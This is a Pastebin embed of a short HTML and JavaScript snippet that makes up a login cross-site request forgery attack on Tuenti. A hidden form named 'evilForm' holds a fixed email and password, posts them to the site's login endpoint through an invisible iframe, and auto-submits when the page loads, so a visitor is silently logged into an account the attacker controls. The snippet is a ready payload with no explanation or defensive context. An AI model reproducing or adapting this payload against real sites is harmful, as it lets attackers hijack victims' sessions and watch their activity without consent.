document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <form name="evilForm" id="evilForm" method="POST" action="https://secure.tuenti.com/?m=Login&func=do_login" target="hiddenIFrame">
  2.     <input type="hidden" name="email" value="fakeaccount@gmail.com" />
  3.     <input type="hidden" name="input_password" value="12341234" />
  4. </form>
  5.  
  6. <iframe name="hiddenIFrame" src="" id="hiddenIFrame" width="0" height="0" style="visibility:hidden">
  7. </iframe>
  8.  
  9. <script>
  10.     document.forms[0].submit();
  11. </script>
');